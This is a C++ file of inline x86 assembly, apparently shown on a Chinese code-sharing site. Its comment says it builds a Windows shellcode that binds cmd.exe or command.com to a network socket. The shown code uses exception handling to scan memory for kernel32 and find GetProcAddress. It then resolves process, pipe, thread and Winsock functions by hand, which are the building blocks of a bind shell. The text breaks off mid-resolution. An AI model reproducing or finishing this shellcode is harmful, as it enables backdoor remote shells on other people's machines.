📄 code.cpp
字号:
/*
利用异常结构处理搜索GetProcAddress入口地址
然后用这个函数加载其他api函数.实现线程一个返回另一个
绑定cmd.exe或command.com功能
*/
#include <stdio.h>
#include <windows.h>
main()
{
_asm
{
call ex
mov eax,0x77000000
mov [ebp-0ch],eax
mov eax,esp
sub eax,8
xchg fs:[0],eax
mov DWORD ptr[ebp-00h],eax
mov eax,fs:[4]
mov DWORD ptr[ebp-04h],eax
mov fs:[4h],ebp
add ecx,34h
push ecx
push eax
mov edx,0
mov byte ptr [edx],0
mov ebp,fs:[4]
mov dword ptr [ebp-8h],0
e104f:
cmp dword ptr [ebp-8h],0
jne exi
mov eax,[ebp-0ch]
add eax,10000h
mov [ebp-0ch],eax
cmp dword ptr [ebp-0ch],78000000h
jne is44
mov dword ptr [ebp-0ch],0BFF00000h
is44:
mov ecx,dword ptr [ebp-0ch]
xor edx,edx
mov dx,word ptr [ecx]
mov dword ptr [ebp-24h],ecx
cmp edx,5A4Dh//ZM
jne e11db
mov eax,[ebp-0ch]
mov ecx,dword ptr [eax+3Ch]
mov edx,dword ptr [ebp-0ch]
xor eax,eax
mov ax,word ptr [edx+ecx]
cmp eax,4550h
jne e11db
mov ecx,dword ptr [ebp-0ch]
mov edx,dword ptr [ecx+3Ch]
mov eax,[ebp-0ch]
mov ecx,dword ptr [eax+edx+78h]
add ecx,dword ptr [ebp-0ch]
mov dword ptr [ebp-10h],ecx
mov edx,dword ptr [ebp-10h]
mov eax,dword ptr [edx+0Ch]
add eax,dword ptr [ebp-0ch]
mov dword ptr [ebp-14h],eax
mov ecx,dword ptr [ebp-14h]
cmp dword ptr [ecx],4E52454Bh
jne e11db
mov edx,dword ptr [ebp-14h]
cmp dword ptr [edx+4],32334C45h
jne e11db
mov eax,dword ptr [ebp-10h]
mov ecx,dword ptr [ebp-0ch]
add ecx,dword ptr [eax+20h]
mov dword ptr [ebp-14h],ecx
mov dword ptr [ebp-18h],0
jmp e1127
e1115:
mov edx,dword ptr [ebp-18h]
add edx,1
mov dword ptr [ebp-18h],edx
mov eax,dword ptr [ebp-14h]
add eax,4
mov dword ptr [ebp-14h],eax
e1127:
mov ecx,dword ptr [ebp-10h]
mov edx,dword ptr [ebp-18h]
cmp edx,dword ptr [ecx+18h]
jge e11db
mov eax,dword ptr [ebp-14h]
mov ecx,dword ptr [eax]
mov edx,dword ptr [ebp-0ch]
cmp dword ptr [edx+ecx],'PteG'
jne e11d6
mov eax,dword ptr [ebp-14h]
mov ecx,dword ptr [eax]
mov edx,dword ptr [ebp-0ch]
cmp dword ptr [edx+ecx+4],'Acor'
jne e11d6
mov eax,dword ptr [ebp-18h]
add eax,dword ptr [ebp-18h]
add eax,dword ptr [ebp-0ch]
mov ecx,dword ptr [ebp-10h]
mov edx,dword ptr [ecx+24h]
xor ecx,ecx
mov cx,word ptr [eax+edx]
mov dword ptr [ebp-14h],ecx
mov edx,dword ptr [ebp-10h]
mov eax,dword ptr [edx+10h]
mov ecx,dword ptr [ebp-14h]
lea edx,dword ptr [ecx+eax-1]
mov dword ptr [ebp-14h],edx
mov eax,dword ptr [ebp-14h]
add eax,dword ptr [ebp-14h]
add eax,dword ptr [ebp-14h]
add eax,dword ptr [ebp-14h]
add eax,dword ptr [ebp-0ch]
mov ecx,dword ptr [ebp-10h]
mov edx,dword ptr [ecx+1Ch]
mov eax,dword ptr [eax+edx]
mov dword ptr [ebp-14h],eax
mov edx,dword ptr [ebp-14h]
add edx,dword ptr [ebp-0ch]
mov dword ptr [ebp-8h],edx
//恢复异常结构
mov eax,DWORD ptr[ebp-00h]
mov fs:[0],eax
mov eax,DWORD ptr[ebp-04h]
mov fs:[4],eax
jmp e11db
e11d6:
jmp e1115
e11db:
jmp e104f
}
//////////////////////////////////////////////////////////////
exi:
//取得各个需要函数的地址
//取得LoadLibraryA入口地址
_asm
{
call ex1
mov dword ptr [ecx-0C70h],ebp
mov dword ptr [ebp-124h],'daoL'
mov dword ptr [ebp-120h],'rbiL'
mov dword ptr [ebp-11Ch],'Ayra'
mov dword ptr [ebp-118h],0000h
lea eax,[ebp-124h]
push eax
mov ebx,dword ptr [ebp-24h]//kernel32.dll 入口地址
push ebx
mov eax,dword ptr [ebp-8h]
mov dword ptr [ebp-4008h],eax//GetProcAddress 入口地址
call eax
mov dword ptr [ebp-400ch],eax//LoadLibraryA 入口地址
//CreatePipe入口地址
mov dword ptr [ebp-124h],'aerC'
mov dword ptr [ebp-120h],'iPet'
mov dword ptr [ebp-11Ch],'ep'
mov dword ptr [ebp-118h],0000h
lea eax,[ebp-124h]
push eax
push ebx
call dword ptr [ebp-8h]
mov dword ptr [ebp-4000h],eax//CreatePipe入口地址
cmp eax,0
jz exit1
//GetVersion入口地址
mov dword ptr [ebp-124h],'VteG'
mov dword ptr [ebp-120h],'isre'
mov dword ptr [ebp-11Ch],'no'
mov dword ptr [ebp-118h],0000h
lea eax,[ebp-124h]
push eax
push ebx
call dword ptr [ebp-8h]
mov dword ptr [ebp-4004h],eax//GetVersion 入口地址
cmp eax,0
jz exit1
//CloseHandle入口地址
mov dword ptr [ebp-124h],'solC'
mov dword ptr [ebp-120h],'naHe'
mov dword ptr [ebp-11Ch],'eld'
mov dword ptr [ebp-118h],0000h
lea eax,[ebp-124h]
push eax
push ebx
call dword ptr [ebp-8h]
mov dword ptr [ebp-4010h],eax//CloseHandle 入口地址
cmp eax,0
jz exit1
//ExitThread入口地址
mov dword ptr [ebp-124h],'tixE'
mov dword ptr [ebp-120h],'erhT'
mov dword ptr [ebp-11Ch],'da'
mov dword ptr [ebp-118h],0000h
lea eax,[ebp-124h]
push eax
push ebx
call dword ptr [ebp-8h]
mov dword ptr [ebp-4014h],eax//ExitThread入口地址
cmp eax,0
jz exit1
//Sleep入口地址
mov dword ptr [ebp-124h],'eelS'
mov dword ptr [ebp-120h],'p'
mov dword ptr [ebp-11Ch],0000h
lea eax,[ebp-124h]
push eax
push ebx
call dword ptr [ebp-8h]
mov dword ptr [ebp-4018h],eax//Sleep入口地址
cmp eax,0
jz exit1
//WriteFile入口地址
mov dword ptr [ebp-124h],'tirW'
mov dword ptr [ebp-120h],'liFe'
mov dword ptr [ebp-11Ch],'e'
mov dword ptr [ebp-118h],0000h
lea eax,[ebp-124h]
push eax
push ebx
call dword ptr [ebp-8h]
mov dword ptr [ebp-401Ch],eax//WriteFile入口地址
cmp eax,0
jz exit1
//PeekNamedPipe入口地址
mov dword ptr [ebp-124h],'keeP'
mov dword ptr [ebp-120h],'emaN'
mov dword ptr [ebp-11Ch],'piPd'
mov dword ptr [ebp-118h],'e'
lea eax,[ebp-124h]
push eax
push ebx
call dword ptr [ebp-8h]
mov dword ptr [ebp-4020h],eax//PeekNamedPipe入口地址
cmp eax,0
jz exit1
//ReadFile入口地址
mov dword ptr [ebp-124h],'daeR'
mov dword ptr [ebp-120h],'eliF'
mov dword ptr [ebp-11Ch],0000h
lea eax,[ebp-124h]
push eax
push ebx
call dword ptr [ebp-8h]
mov dword ptr [ebp-4024h],eax//ReadFile入口地址
cmp eax,0
jz exit1
//GetStartupInfoA入口地址
mov dword ptr [ebp-124h],'SteG'
mov dword ptr [ebp-120h],'trat'
mov dword ptr [ebp-11Ch],'nIpu'
mov dword ptr [ebp-118h],'Aof'
lea eax,[ebp-124h]
push eax
push ebx
call dword ptr [ebp-8h]
mov dword ptr [ebp-4028h],eax//GetStartupInfoA入口地址
cmp eax,0
jz exit1
//CreateProcessA入口地址
mov dword ptr [ebp-124h],'aerC'
mov dword ptr [ebp-120h],'rPet'
mov dword ptr [ebp-11Ch],'seco'
mov dword ptr [ebp-118h],'As'
lea eax,[ebp-124h]
push eax
push ebx
call dword ptr [ebp-8h]
mov dword ptr [ebp-402Ch],eax//CreateProcessA入口地址
cmp eax,0
jz exit1
//CreateThread入口地址
mov dword ptr [ebp-124h],'aerC'
mov dword ptr [ebp-120h],'hTet'
mov dword ptr [ebp-11Ch],'daer'
mov dword ptr [ebp-118h],0000h
lea eax,[ebp-124h]
push eax
push ebx
call dword ptr [ebp-8h]
mov dword ptr [ebp-4008h],eax//CreateThread入口地址
cmp eax,0
jz exit1
}
//load wsock32.dll
_asm
{
mov dword ptr [ebp-124h],'cosw'
mov dword ptr [ebp-120h],'.23k'
mov dword ptr [ebp-11Ch],'lld'
mov dword ptr [ebp-118h],0000h
lea eax,[ebp-124h]
push eax
call dword ptr [ebp-400ch]
cmp eax,0
jz exit1
mov ebx,eax
//WSAStartup入口地址
mov dword ptr [ebp-124h],'SASW'
mov dword ptr [ebp-120h],'trat'
mov dword ptr [ebp-11Ch],'pu'
mov dword ptr [ebp-118h],0000h
lea eax,[ebp-124h]
push eax
push ebx
call dword ptr [ebp-8h]
mov dword ptr [ebp-4030h],eax//WSAStartup入口地址
cmp eax,0
jz exit1
//__WSAFDIsSet入口地址
mov dword ptr [ebp-124h],'SW__'
mov dword ptr [ebp-120h],'IDFA'
mov dword ptr [ebp-11Ch],'teSs'
mov dword ptr [ebp-118h],0000h
lea eax,[ebp-124h]
push eax
push ebx
call dword ptr [ebp-8h]
mov dword ptr [ebp-4034h],eax//__WSAFDIsSet入口地址
cmp eax,0
jz exit1
//socket入口地址
mov dword ptr [ebp-124h],'kcos'
mov dword ptr [ebp-120h],'te'
mov dword ptr [ebp-11Ch],0000h
lea eax,[ebp-124h]
push eax
push ebx
call dword ptr [ebp-8h]
mov dword ptr [ebp-4038h],eax//socket入口地址
cmp eax,0
jz exit1
//closesocket入口地址
mov dword ptr [ebp-124h],'solc'
mov dword ptr [ebp-120h],'cose'
mov dword ptr [ebp-11Ch],'tek'
mov dword ptr [ebp-118h],0000h
lea eax,[ebp-124h]
push eax
push ebx
call dword ptr [ebp-8h]
mov dword ptr [ebp-403Ch],eax//closesocket入口地址
cmp eax,0
jz exit1
//select入口地址
mov dword ptr [ebp-124h],'eles'
mov dword ptr [ebp-120h],'tc'
mov dword ptr [ebp-11Ch],0000h
lea eax,[ebp-124h]
push eax
push ebx
call dword ptr [ebp-8h]
mov dword ptr [ebp-4040h],eax//select入口地址
cmp eax,0
jz exit1
//recv入口地址
mov dword ptr [ebp-124h],'vcer'
mov dword ptr [ebp-120h],0000h
lea eax,[ebp-124h]
push eax
push ebx
call dword ptr [ebp-8h]
mov dword ptr [ebp-4044h],eax//recv入口地址
cmp eax,0
jz exit1
//send入口地址
mov dword ptr [ebp-124h],'dnes'
mov dword ptr [ebp-120h],0000h
lea eax,[ebp-124h]
push eax
push ebx
call dword ptr [ebp-8h]
mov dword ptr [ebp-4048h],eax//send入口地址
cmp eax,0
jz exit1
//htons入口地址
mov dword ptr [ebp-124h],'noth'
mov dword ptr [ebp-120h],'s'
mov dword ptr [ebp-11Ch],0000h
lea eax,[ebp-124h]
push eax
push ebx
call dword ptr [ebp-8h]
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -